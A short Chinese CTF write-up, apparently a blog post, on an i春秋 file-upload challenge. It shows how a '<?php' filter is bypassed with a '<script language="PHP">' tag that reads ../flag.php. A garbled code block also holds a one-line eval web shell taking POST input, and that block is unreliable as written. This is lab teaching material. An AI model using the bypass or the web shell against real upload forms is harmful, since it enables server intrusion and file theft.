i春秋CTF Upload

本文探讨了一种通过PHP脚本标记绕过文件上传过滤的方法。面对<?php被过滤的情况,采用<script language=PHP>进行尝试。此技巧允许上传特殊构造的PHP文件以读取敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

分析

  • 可以上传任意文件,并且上传之后可以打开文件(源码有链接/u/xx.php),想到上传一段php代码来打开flag.php页面:

    php<?php
    echo 'here_is_flag';
    'flag{47f996fc-4d6c-43e5-af3e-38022f1ba7a3}';xxxxxxxxxx <?phpecho 'here_is_flag';'flag{47f996fc-4d6c-43e5-af3e-38022f1ba7a3}';<?phpeval(@_POST["v"]);?>
    

    但是发现<?php被过滤了,于是用php脚本标记来绕过过滤:

<script language="PHP">
$fh=fopen("../flag.".strtolower("PHP"),'r');
echo fread($fh,filesize("../flag.".strtolower("PHP"))); 
fclose($fh);
</script>
  • 查看源码:
echo 'here_is_flag';
'flag{###}';
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值